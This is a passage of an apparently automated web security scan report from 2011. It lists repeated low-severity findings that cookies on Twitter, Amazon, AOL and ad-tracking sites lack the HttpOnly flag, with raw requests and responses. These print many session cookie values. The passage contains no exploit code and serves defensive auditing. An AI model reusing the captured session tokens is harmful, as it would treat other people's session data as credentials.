Set-Cookie: ASPSESSIONIDSABQACCS=EBBIKHPBAPMOLLILHIAIEMFN; path=/
Date: Sun, 30 Jan 2011 01:37:11 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

17.19. https://secure.opinionlab.com/ccc01/o.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/o.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/o.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABQACCS=LHLFKHPBAJOOIDHFICBAPGEC; path=/
Date: Sat, 29 Jan 2011 23:50:47 GMT
Connection: close


17.20. https://secure.opinionlab.com/ccc01/o.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /ccc01/o.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/o.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCDTCACS=DPCFIDMCHKHICEPBPALEFKKC; path=/
Date: Sun, 30 Jan 2011 16:57:26 GMT
Connection: close


17.21. http://t.mookie1.com/t/v1/imp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=5845715&migTrackFmtExt=client;io;ad;crtv HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:27:29 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: session=1296350849|1296350849; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

17.22. http://travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Low
Confidence:   Firm
Host:   http://travel.aol.com
Path:   /$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /$%7Chttp:/netscape.aol.com/$%7Chttp:/music.aol.com/radioguide/bb/$%7Chttp:/money.aol.com/$%7Chttp:/www.aim.com/help_faq/starting_out/buddylist.adp/$%7Chttp:/www.weblogs.com/$%7Chttp:/smallbusiness.aol.com/$%7Chttp:/www.blackvoices.com/$%7Chttp:/latino.aol.com/$%7C.ivillage.com.*/1%7Cwww.ivillage.com/(celeb-news%7Centertainment-photos%7Ctv%7Cfor-kids%7Cvideo%7Centertainment%7Cmovies%7Cfood%7Crecipes%7Ctable-talk%7Cfood-for-kids%7Cfood-advice%7Cfood-news%7Cfood-video
Date: Sun, 30 Jan 2011 01:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=24C8300C2A06E9010602B17132ED72CA; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Length: 53066


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

17.23. http://trueslant.com/milesobrien/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://trueslant.com
Path:   /milesobrien/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /milesobrien/ HTTP/1.1
Host: trueslant.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:01:12 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-3ubuntu4.5
Vary: Cookie,Accept-Encoding
X-FBC-Login: anonymous fbuid=0, wpuid=0
X-Pingback: http://trueslant.com/milesobrien/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSSESSID=ts-www0; path=/
Content-Length: 75441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" dir="ltr" xmlns:fb="http
...[SNIP]...

17.24. http://twitter.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 01:51:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296352284-49541-12061
ETag: "cde121a33e5e26c8e020ac06ab7c0791"
Last-Modified: Sun, 30 Jan 2011 01:51:24 GMT
X-Runtime: 0.00851
Content-Type: text/html; charset=utf-8
Content-Length: 45480
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296352284099799; path=/; expires=Sun, 06-Feb-11 01:51:24 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635228410273876; path=/; expires=Tue, 01 Mar 2011 01:51:24 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWY3NzI0MTZlMzM1NDZkMGY1ZTRhYmFmNDRmZGQwYzk2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIyA2e1C0B--25862b81113d9ea376a5433cc256332cc9ae6576; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

17.25. http://twitter.com/$1

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /$1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /$1 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 30 Jan 2011 01:51:25 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1296352285-22471-55414
Last-Modified: Sun, 30 Jan 2011 01:51:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296352285964730; path=/; expires=Sun, 06-Feb-11 01:51:25 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635228597484210; path=/; expires=Tue, 01 Mar 2011 01:51:25 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIhpodHRwOi8vdHdpdHRlci5jb20vJDE6B2lkIiUz%250AMDJhZjczMTdmZTIxZDk3NzMzNDBiYTMyNDM0ZmVkYyIKZmxhc2hJQzonQWN0%250AaW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoP%250AY3JlYXRlZF9hdGwrCBcVntQtAQ%253D%253D--b2904d61596531162db12f902f763da54e6b7b41; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

17.26. http://twitter.com/HelenASPopkin

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /HelenASPopkin

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HelenASPopkin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:02:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356567-38386-11000
ETag: "ea52c5afedc85cb07c6fff4a75310922"
Last-Modified: Sun, 30 Jan 2011 03:02:47 GMT
X-Runtime: 0.01712
Content-Type: text/html; charset=utf-8
Content-Length: 52277
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356567344651; path=/; expires=Sun, 06-Feb-11 03:02:47 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635656738576607; path=/; expires=Tue, 01 Mar 2011 03:02:47 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWMwOWVkYzE1OTI2MDk0NDQ1ZGJiYjRjMmFiYmJlNTNlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIW2nf1C0B--6f9e351ce1cfdf99abad41c8d129848e96fc4a8b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

17.27. http://twitter.com/MichaelWann

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /MichaelWann

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MichaelWann HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:02:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356547-81727-2377
ETag: "8262f10ce7c81e5136cabe2a78847bad"
Last-Modified: Sun, 30 Jan 2011 03:02:27 GMT
X-Runtime: 0.01194
Content-Type: text/html; charset=utf-8
Content-Length: 52843
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356547913422; path=/; expires=Sun, 06-Feb-11 03:02:27 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635654792136829; path=/; expires=Tue, 01 Mar 2011 03:02:27 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTNmZTg1NjI1MTBlYzM3OTk0YzQwOGRkYTcxODQyOTYzIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIUh3f1C0B--ba2b2e85d86e8242c7c9defb78d02e28bd4f565e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

17.28. http://twitter.com/home

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /home

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Found
Date: Sun, 30 Jan 2011 01:22:08 GMT
Server: hi
Status: 302 Found
Location: http://twitter.com/login?redirect_after_login=%2Fhome
X-Runtime: 0.00200
Content-Type: text/html; charset=utf-8
Content-Length: 119
Cache-Control: no-cache, max-age=300
Set-Cookie: k=173.193.214.243.1296350528168573; path=/; expires=Sun, 06-Feb-11 01:22:08 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635052817015374; path=/; expires=Tue, 01 Mar 2011 01:22:08 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIhxodHRwOi8vdHdpdHRlci5jb20vaG9tZToHaWQi%250AJWRjMWRmOThmMDAwNDUzYjkyYTM3NmFmOTNjNGU0MTQ5IgpmbGFzaElDOidB%250AY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA%250AOg9jcmVhdGVkX2F0bCsIq0KD1C0B--af7bf9547cbf91a6342f4ce9df7d07f956b84c1c; domain=.twitter.com; path=/
Expires: Sun, 30 Jan 2011 01:27:08 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fhome">redirected</a>.</body></html>

17.29. http://twitter.com/status/user_timeline/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /status/user_timeline/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /status/user_timeline/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 30 Jan 2011 01:51:27 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1296352287-29136-7189
Last-Modified: Sun, 30 Jan 2011 01:51:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296352287179441; path=/; expires=Sun, 06-Feb-11 01:51:27 GMT; domain=.twitter.com
Set-Cookie: guest_id=12963522871862479; path=/; expires=Tue, 01 Mar 2011 01:51:27 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWQwOTAwOWQ4YTEyZTkwNjk3ZWUwNjg3ZTU1MTZkODkwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI0xme1C0B--a43ce2094d1eef88867360254755d2f875798bf8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

17.30. http://twitter.com/windabenedetti

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /windabenedetti

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /windabenedetti HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:02:57 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356577-57560-43117
ETag: "37e7d4764aa4356aeb8c7f93b34df6b0"
Last-Modified: Sun, 30 Jan 2011 03:02:57 GMT
X-Runtime: 0.00997
Content-Type: text/html; charset=utf-8
Content-Length: 49069
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356577758623; path=/; expires=Sun, 06-Feb-11 03:02:57 GMT; domain=.twitter.com
Set-Cookie: guest_id=12963565777757520; path=/; expires=Tue, 01 Mar 2011 03:02:57 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWZiZjBlYjQ4OTMwMGMzOTA3Nzg4OTQxNTc0YzEzN2JmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI8JHf1C0B--5fe442064eb48ecd736f8d0fc43646e6d9ffb6d4; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

17.31. http://twitter.com/wjrothman

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /wjrothman

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wjrothman HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:02:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356563-11223-39959
ETag: "067321df962e685b47091af05f4b9fbc"
Last-Modified: Sun, 30 Jan 2011 03:02:43 GMT
X-Runtime: 0.01619
Content-Type: text/html; charset=utf-8
Content-Length: 49641
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356563232205; path=/; expires=Sun, 06-Feb-11 03:02:43 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635656362644604; path=/; expires=Tue, 01 Mar 2011 03:02:43 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTVjMmFiMWM4ZTg4ZjRhNmE2N2QyZTlhMzYyMDlkNTNlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIrFrf1C0B--3aa7bb9fe9c6795ddbbf9680544888cbf7541ea2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

17.32. https://twitter.com/ToddKenreck

Summary

Severity:   Low
Confidence:   Firm
Host:   https://twitter.com
Path:   /ToddKenreck

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ToddKenreck HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:03:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356581-64489-22662
ETag: "64fd45f3d163ffe5f3eb5309c6bbafbb"
Last-Modified: Sun, 30 Jan 2011 03:03:01 GMT
X-Runtime: 0.01332
Content-Type: text/html; charset=utf-8
Content-Length: 38284
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356581648173; path=/; expires=Sun, 06-Feb-11 03:03:01 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635658185310608; path=/; expires=Tue, 01 Mar 2011 03:03:01 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCN%252Bh39QtAToHaWQiJTZkNWFlYzNiNjc5OTZk%250AN2JjM2EyOTg3YzdkNWU2Y2U5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--0004367452c498e4750ca5a1e95bbdef70cffad9; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

17.33. http://www.amazon.com/gp/product/0470650923

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/0470650923

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/product/0470650923?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0470650923 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:52 GMT
Server: Server
x-amz-id-1: 10BYGVG84SJDT6NK5QPW
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Q88q6IxskVrNIWayV7qw53kBxjzbTCVGq9rikqIi4h0WIkQdBAnBtxKB8IUJkYyC
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=192-2919974-2112928; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=yQ9pIXqVNQ+kictSRtVelTJ1cwo6IQrEPJd+SWonrlO++kyS3eLyIk/nXbtbxx8D0mbpsSGjtlUuYe0vRowEBFX4sJLod/zu37k/IErBpleFnaz490Xa9SJrjYxKo9y6hu8Qw1NAIvP4UUaxU2L8jbY4r+JHs4ZKm4hST9QEmWm4QdymYv1J0wtClao472qWA+wllUTs9XnshUSKK5Zm7V07ZqJFh4wIijJE8gGWy6ub2Eb0pbSAyRM/8LmJTh6hNxn3d/uTTI7mbtQzIJuC04Uu58ASnyvxk5fZ6wzy7FLYCySmGxvLO1zbG7cicDX3t7BaUJKRVQDLOs9+B6raaQASSQzPOHnazizlJ7UsFvCoBiazT7uOFWxYUsf/18czWXcuM7antU7XxMLLqoSkfFWlqwjyu3ae8xXJ53xwMF3gWWGRilFqmd2KJU/GPs60FA1sCx6Rd0c=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:52 2011 GMT
Content-Length: 413393


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...

17.34. http://www.amazon.com/gp/product/0672333368

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/0672333368

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

